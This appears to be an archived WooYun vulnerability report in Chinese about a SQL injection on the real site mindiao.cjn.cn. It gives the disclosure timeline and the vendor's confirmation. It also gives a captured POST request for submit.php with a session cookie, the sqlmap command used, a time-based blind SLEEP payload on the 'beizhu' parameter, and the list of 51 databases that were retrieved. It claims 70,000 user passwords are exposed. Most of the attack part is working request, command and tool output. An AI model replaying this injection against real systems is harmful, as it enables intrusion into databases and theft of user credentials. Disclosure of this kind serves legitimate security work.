乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 细节已通知厂商并且等待厂商处理中 2015-12-30: 厂商已经确认,细节仅向厂商公开 2016-01-09: 细节向核心白帽子及相关领域专家公开 2016-01-19: 细节向普通白帽子公开 2016-01-29: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
poxt.txt
POST /2013xjj/submit.php HTTP/1.1Content-Length: 391Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://mindiao.cjn.cn:80/Cookie: PHPSESSID=vmmpv1si1kbpq33vcpcr05lvc1Host: mindiao.cjn.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Submit=%e6%8f%90%20%20%20%e4%ba%a4&beizhu=%e5%8e%9f%e5%88%9b&bianju=1&company=Acunetix&content=1&daoyan=1&jmmc=1&phone=1&realname=jrwfwmba&shouji=1&sjcd=1&typename=%e4%b8%93%e4%b8%9a%e7%bb%84&xjxs=%e8%af%9d%e5%89%a7&yanyuan=1&yclx=%e5%a4%9a%e5%b9%95%e5%89%a7
sqlmap.py -r post.txt --dbs
sqlmap identified the following injection point(s) with a total of 1419 HTTP(s) requests:---Parameter: beizhu (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: Submit=%e6%8f%90 %e4%ba%a4&beizhu=%e5%8e%9f%e5%88%9b' AND (SELECT * FROM (SELECT(SLEEP(5)))Yqzd) AND 'gEEt'='gEEt&bianju=1&company=Ae5%a4%9a%e5%b9%95%e5%89%a7---[23:00:39] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.27, PHP 5.2.17back-end DBMS: MySQL 5.0.12[23:00:39] [INFO] fetching database names[23:00:39] [INFO] fetching number of databases[23:00:39] [INFO] retrieved:[23:00:39] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors51available databases [51]:[*] `#mysql50#cjntj.bak`[*] `#mysql50#cjnvote.bak`[*] `#mysql50#phpwind.bak`[*] cc[*] ccvms[*] cjnphoto[*] cjnvote[*] collabtive[*] dwz[*] information_schema[*] maps[*] mingpai[*] mysql[*] myt[*] newdata_user[*] osfc[*] phpstat_mysql_10_mysql[*] phpstat_mysql_10_mysql_log[*] phpstat_mysql_1_mysql[*] phpstat_mysql_1_mysql_log[*] phpstat_mysql_2_mysql[*] phpstat_mysql_2_mysql_log[*] phpstat_mysql_3_mysql[*] phpstat_mysql_3_mysql_log[*] phpstat_mysql_4_mysql[*] phpstat_mysql_4_mysql_log[*] phpstat_mysql_5_mysql[*] phpstat_mysql_5_mysql_log[*] phpstat_mysql_6_mysql[*] phpstat_mysql_6_mysql_log[*] phpstat_mysql_7_mysql[*] phpstat_mysql_7_mysql_log[*] phpstat_mysql_8_mysql[*] phpstat_mysql_8_mysql_log[*] phpstat_mysql_9_mysql[*] phpstat_mysql_9_mysql_log[*] phpstat_mysql_mysql[*] phpstat_web[*] phpwind[*] phpwindcs[*] test[*] TriAquae[*] tweibo[*] veryvote[*] vsftpduser[*] wh4z[*] whwx[*] wordpress[*] xweibo[*] xweibo2x[*] zhenhao
涉及整站数据库
数据库:
当前库的表 可导致7万用户密码泄露
密码:
你们更专业
危害等级:中
漏洞Rank:10
确认时间:2015-12-30 11:02
谢谢
暂无